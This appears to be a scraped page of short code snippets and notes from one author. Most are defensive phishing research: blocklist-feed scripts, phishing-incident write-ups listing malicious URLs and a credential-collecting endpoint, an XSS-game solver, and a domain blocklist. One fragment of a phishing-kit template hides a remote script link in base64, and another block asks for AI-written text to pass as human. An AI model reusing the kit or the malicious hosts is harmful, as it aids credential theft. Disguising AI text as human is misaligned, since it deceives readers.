miglen

import requests
from datetime import datetime

class OfficeRNDClient:
    def __init__(self, username, password, org_name):
        self.session = requests.Session()
        self.base_url = 'https://hybrid.officernd.com'
        self.username = username
        self.password = password
        self.org_id = org_name

miglen

Additional Instructions

Make the writing sound naturally human, not like AI-generated content.

Words to avoid: landscape, tapestry, bustling, debunk, embark, game-changer, harness, strides, supercharge, trailblazing, unleash, unlock, yield, delve, seamlessly, ecosystem, paradigm, framework, synergy, revolutionize, disrupt, transformative, cutting-edge, showcase, unravel, illuminate, streamline, insightful, highlight, analyze Tone words to avoid: innovative, pivotal, groundbreaking, state-of-the-art, world-class, seamless integration, dynamic team, passion for X, leveraging synergies, drive meaningful impact

Phrases to avoid:

• it’s important to note
• unlock the potential of
• navigating (e.g., "navigating the landscape", "navigating the complexities")

miglen

#!/bin/bash

folder_prefix="./feeds/" # $(date +%Y/%m/%d)
mkdir -p ${folder_prefix}
rm -f ${folder_prefix}/*.txt

curl -L -s https://phishing.army/download/phishing_army_blocklist_extended.txt -o ${folder_prefix}/phishing_army_domains.txt
curl -L -s https://hole.cert.pl/domains/domains.csv | cut -f 2 > ${folder_prefix}/cert_pl_domains.txt
curl -L -s https://urlabuse.com/public/data/phishing_url.txt -o ${folder_prefix}/urlabuse_urls.txt
curl -L -s https://threatview.io/Downloads/DOMAIN-High-Confidence-Feed.txt -o ${folder_prefix}/threatview_domains.txt

miglen

scrapy () {
get \
  --mirror \
  --no-clobber \
  --page-requisites \
  --adjust-extension \
  --convert-links \
  --restrict-file-names=windows \
  --domains=$1 \
  --no-parent \

miglen

Phishing portal

The following portal is using microsoft forms to send out the emails to potential victims. Form URL: https://ncv.microsoft.com/xfzlQmbcLr Portal URL: https://27-02-0-f39h5r8g-wrfgw0e8c3-t0rf7-0wrg-g7.obs.ap-southeast-2.myhuaweicloud.com/vt65g-09we-0t9hng-0w9rmvfj-e09thg-9rjfg9-er.html?AWSAccessKeyId=FQWNSQAJNPZJXV8B91KK&Expires=1677494075&Signature=cBYwgWA9mU%2BlQTS/FMhe6QYGcoE%3D POST location: https://techsmashwru.ru/.cas/next.php

miglen

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <script>
        let EMAIL_ADDRESS = "user@company.com"; // Change this to the email address

        let BASED64_ENCODED_EMAIL = "";  // If you wish to encode the email address, enter the based64 encoded email and leave the email address blank otherwise, leave this field blank

        let SCRIPT_LINK_URL = window.atob("aHR0cHM6Ly9tZWdhdGVycmEuaHUvc2NyaXB0LnBocA"); //Enter the script link here

miglen

This is the contents from a phishing attemt I had recieved recently.

Workflow

1. Recieve an attachment.html usually from a free email service.
2. The email contains html file with encoded JS that would call http://angelotti.it/cms/moj1.js
3. Once you open the html file an outlook login portal will be visualized to authenticate.

IoCs:

miglen

Today I had recieved an interesting phishing message via Messenger from a frend, who's also a tech guy so it was suprirpising that he got compromised.

The initial message said:

Is it you in this video? 😱
https://zu7.eu/L3VAD6EzsR

The url loaded from any browser, orther than mobile will redirect to twitch.tv otherwise it would display the following html:

miglen

import requests
import time
import urllib.parse
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.common.exceptions import NoAlertPresentException

url = "https://xss-game.appspot.com/level1/frame"
response = requests.get(url)
soup = BeautifulSoup(response.text)

miglen

# Source https://github.com/Esox-Lucius/PiHoleblocklists
0-800-email.com
0-aprcredit-card.website
0-aprcredit-cards.website
0-aprcreditcard.website
0-aprcreditcards.website
0-secure-paypal.com
0.0.0.0	0-0.028.openvpn.cloud.btcchina.com
0.0.0.0	0-100-195.btcc.com
0.0.0.0	0-100-bhd.foxypool.cf